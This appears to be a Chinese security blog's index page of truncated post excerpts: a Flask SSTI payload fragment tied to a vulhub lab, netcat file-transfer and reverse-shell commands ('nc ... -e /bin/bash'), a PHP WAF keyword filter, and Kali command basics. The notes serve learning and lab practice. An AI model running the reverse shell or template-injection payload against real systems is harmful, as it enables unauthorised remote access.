摘要：https://github.com/vulhub/vulhub/tree/master/flask/ssti GlobalsAttrCount=0 for a in ().__class__.__base__.__subclasses__(): if hasattr(a.__init__,'__g 阅读全文

摘要：nc 1.Transferring Files 接收方： nc -lvvp 4444 > recive.file 发送方： nc -vv 10.0.1.1 4444 < send.file 2.Reverse Shell victim: nc -vv 10.0.1.1 4444 -e /bin/ba 阅读全文

摘要：1 public function waf($s) { if (preg_match_all('/'. implode('|', array( '[' . preg_quote("(*<=>|'&-@") . ']', 'select', 'and', 'or', 'if', 'by', 'from 阅读全文

摘要：Bash History !num 重新执行history中的第num条命令 !! 重新执行上一条命令 ctrl+r 在历史中搜索命令 Text Searching grep sed awk cut wc sort Diff File diff and vimdiff 计划任务 一次计划任务：at 阅读全文

摘要：Manage KALI services ss命令用来socket统计信息，达到类似netstat的功能，但是更加高效快捷 + ss [option] [filter] r 解析主机名 l 显示listening的socket p 显示使用socket的进程 4 ipv4 6 ipv6 t tcp 阅读全文